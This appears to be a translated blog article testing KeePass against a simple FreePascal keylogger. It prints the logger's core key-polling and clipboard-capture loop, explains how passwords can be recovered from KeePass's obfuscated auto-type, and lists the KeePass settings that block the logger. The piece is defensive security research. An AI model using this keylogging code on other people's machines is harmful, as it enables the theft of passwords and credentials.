The easiest keylogger and security in KeePass

To check the security of the entered passwords via KeePass, I decided to write a simple keylogger with an additional capture of data from the clipboard. All code took a few lines on FreePascal.

Passwords, without additional measures of protection and proper configuration of KeePass, as it turned out, are quite vulnerable.

The keylogger code is placed in a Timer loop, which is updated every 10 ms. Used modules: Windows and ClipBrd.

//    for f := 0 to 255 do if a[f] <> GetAsyncKeyState(f) then begin //    if KeePass.Checked and (GetAsyncKeyState(f) = 0) then Memo1.Caption := Memo1.Caption + chr(f); //    if not KeePass.Checked and (GetAsyncKeyState(f) <> 0) then Memo1.Caption := Memo1.Caption + chr(f); end; //      for f := 0 to 255 do a[f] := GetAsyncKeyState(f); //      if s <> Clipboard.AsText then begin s := Clipboard.AsText; Memo2.Caption := Memo2.Caption + s + ' '; end; 

The Simple Logger program looks like this:
')


The -Keyboard- window displays keys that are not case sensitive or an input language. The symbol whose number is the key code is displayed: chr (f). You can modify the program to correctly display all characters, but this is not required for the present study.

In -Clipboard- window is copied when changing the contents of the buffer.

KeePass weak points and their removal

1. Enter the main password

By default, the KeePass primary password is entered without protected mode, so it is easily defined in Simple Logger. This is the most critical place in security, because here we get access to the entire password database at once.

To fix the problem, you must enable the Security setting “Enter the main password in protected mode (like UAC in Windows Vista and higher)”. This mode does not allow the logger to access the keyboard. In addition, it is impossible to take a screenshot in it to determine the location of the Key File.

This mode is enabled only when entering the main password. The protection of other passwords will be discussed further.

2. Clipboard

Simple Logger responds to changes in the clipboard with a frequency of 100 times per second. Thus, hitting the password in the buffer and its subsequent deletion after a few seconds does not provide protection in this case.

To fix this problem, you can use Auto Dial.

3. Auto dial

The reaction to the KeePass autodial occurs on pushing the key, not pressing. This allows you to get protection from some keyloggers. To bypass this, Simple Logger has an additional setting: “KeePass Auto-Type”. If it is on, the logger is triggered by pushing the key.

When auto-dialing via KeePass: MyLoginName LongPassword123

A record will appear in Simple Logger:



Simple Logger neither takes into account the shortcut keys. As you can see, the Shift key is displayed as a special character (similar to “+”) and “?”. Shift is released both before and after the capital letter. However, this is enough to understand the password.

To solve this problem, you can use the “Double complication of autodialing” setting in KeePass. In this case, KeePass will enter part of the password from the keyboard, and part through the clipboard, mixing the values. This allows you to bypass some keyloggers.

Simple Logger on Dual complication autodial will respond as follows:

• Paste from clipboard “Ctrl + V” was displayed as “V◄?”;
• Left arrow - “%” (key code and # 37 symbol);
• The right arrow is “'” (key code and # 39 symbol).

You can write a small algorithm and recover the correct password using data from both windows. This setting complicates the work of the keylogger, but does not guarantee protection - if desired, the password is easily restored.

From the keylogger, which is “sharpened” under KeePass, additional means of protection can help.

4. Additional security features

In some software packages there are such features as:

• Protection of data input from the hardware keyboard;
• Secure Browser.

When you enable data entry protection from the hardware keyboard, Simple Logger can no longer receive data from the KeePass autodial if they are entered into the password form in the browser. In this case, the weak point will be work through the clipboard.

When using a secure browser, access to the clipboard and keyboard using Simple Logger failed. In addition, it was not possible to take screenshots.

Instead of conclusion

After seeing how our employees use KeePass, I found some:

• do not use UAC;
• do not use autodial, simply copying passwords through the buffer;
• leave the program open, leaving the workplace;
• use default settings without setting security policy.

I am a manager in a small company, a little fond of programming. I am not a technical specialist or an expert in the field of security, so I would be happy if more experienced specialists point out the shortcomings of my small research.

I tested the latest version of KeePass 2.36 on Windows 8.1. To be fair, it should be noted that this problem is not just a KeePass problem. There are many other password keepers with a greater or lesser degree of security, but this is a topic for another study.

Links

1. Simple Logger on github
   // Who is not afraid, in the archive "SimpleLogger_for_Win64.7z" you can find exe-shnik. The program does not allow to conduct full-fledged key logging, it is intended for security research and informational purposes.
2. Key Codes

UPD (07/27/2017)

Browser Plugin

As the user dartraiden noted , you can use the KeePassHttp module in conjunction with the browser add-on PassIFox or ChromeIPass . This plugin (according to the developer) provides a secure exposure of KeePass entries over HTTP.

This link allows you to automatically fill in the login and password in the browser when KeePass is unlocked. Simple Logger does not react in this case either.

The weak point of ChromeIPass is the generation of a new password, because It is copied through the clipboard and is visible on the screen. In this case, it is better to generate a new password in KeePass itself.

Creating a new master password

As arthur_veber noted:

When replacing the master password, as well as creating a new one, safe mode is not applied.

In this case, Simple Logger intercepts the master password entered in KeePass.

The virtual on-screen keyboard from a well-known manufacturer does not help either, which, like the KeePass autodial, works on a push-up event.



It’s hard to give advice here. Perhaps you need to draw the attention of developers to this problem.

Other means of attack

As the user qw1 was the first to notice, if the system on which KeePass is installed is compromised, then other means of attack can be used besides the keylogger. In this case, the list of actions to counter the attack will depend on the specific situation.

Unfortunately, it is impossible to cover in one article all the protection measures necessary for storing passwords.